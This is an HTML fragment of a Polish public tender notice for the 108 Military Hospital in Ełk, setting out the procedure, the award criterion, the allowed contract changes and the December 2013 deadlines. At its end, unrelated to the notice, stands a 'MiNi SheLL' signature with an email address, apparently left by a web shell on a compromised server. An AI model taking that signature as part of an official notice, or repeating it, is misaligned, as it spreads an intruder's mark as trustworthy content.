<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem postanowień w art. 144 ust. 1 Ustawy Prawo Zamówień Publicznych:
Zamawiający dopuszcza możliwość zmiany cen w zakresie ich obniżenia w trakcie trwania umowy.
Zamawiający w trakcie realizacji umowy może dokonać przesunięć ilościowych asortymentu, według bieżących potrzeb i celowości zakupu, przy czym ogólna wartość przedmiotu zamówienia nie przekroczy kwoty zapisanej w umowie. 
Zamiany w zakresie danych dotyczących stron.
Zamawiający dopuszcza zmianę ceny w przypadku zmiany przepisów prawa podatkowego w okresie obowiązywania umowy dotyczących stawek VAT, przy czym zmiana nastąpi w wartości brutto, wartość netto pozostaje bez zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.108spzoz.elk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 108 Szpital Wojskowy z Przychodnią SP ZOZ
Kościuszki 30
19-300 Ełk
Pokój nr 4 DZIAŁ ZAMÓWIEŃ PUBLICZNYCH.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.12.2013 godzina 09:30, miejsce: 108 Szpital Wojskowy z Przychodnią SP ZOZ
Ul. Kościuszki 30
19-300 Ełk
Pokój nr 22 KANCELARIA OGÓLNA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 09.01.2014.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com